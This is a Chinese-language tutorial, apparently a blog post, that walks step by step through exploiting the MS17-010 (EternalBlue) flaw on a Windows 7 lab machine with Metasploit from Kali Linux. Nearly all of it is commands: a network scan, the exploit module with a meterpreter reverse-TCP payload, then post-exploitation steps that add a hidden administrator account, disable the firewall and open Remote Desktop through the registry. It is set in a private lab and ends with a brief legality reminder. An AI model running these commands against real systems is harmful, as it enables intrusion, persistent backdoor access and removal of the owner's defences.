注:針對的系統是Windows7 64位操作系統,其他操作系統請自行測試。
一.測試環境:
kali linux:192.168.121.128 (攻擊機)
win7:192.168.121.130 (目標靶機)
二.攻擊前的准備
1.查看kali的ip地址
命令:ifconfig

2.使用nmap掃描局域網內的所有主機(ms17_010漏洞的最基本要求是需要開啟445端口)
命令:nmap 192.168.121.1/24

可以看到445端口開着,那就可以開始我們的攻擊利用
3.開啟Metasploit框架
命令:msfconsole

4.搜索ms17_010漏洞(永恆之藍)
命令:search ms17_010

5.使用永恆之藍漏洞
命令:use exploit/windows/smb/ms17_010_eternalblue

6.顯示所需要的參數
命令:show options

三.設置攻擊參數
1.設置目標主機
命令:set rhost 192.168.121.130

2.設置攻擊載體(一個好用的攻擊模塊)
命令:set payload windows/x64/meterpreter/reverse_tcp

3.設置攻擊機ip,用來攻擊成功之后,監聽被開放的目標電腦的端口(一開始查的kali的ip)
命令:set lhost 192.168.121.128
![]()
4.檢查參數是否配置正確
命令:show options

四.攻擊
命令:run

五.利用
1.獲取截屏
命令:screenshot

2.靶機shell(以管理員身份打開靶機的cmd)
命令:shell

六.拿到shell后可進行的操作(Dos命令)
1.創建一個叫szsec,密碼為123456的用戶
命令:net user szsec 123456 /add

2.對剛才創建的用戶提權為管理員
命令:net localgroup administrators szsec /add

3.關閉防火牆
命令:netsh firewall set opmode mode=disable

4.查看開啟的端口
命令:netstat -ano

5.開啟3389端口
命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

七.遠程桌面
1.使用win10的遠程桌面管理

2.遠程桌面成功

最后:互聯網不是法外之地,大家且行且珍惜~
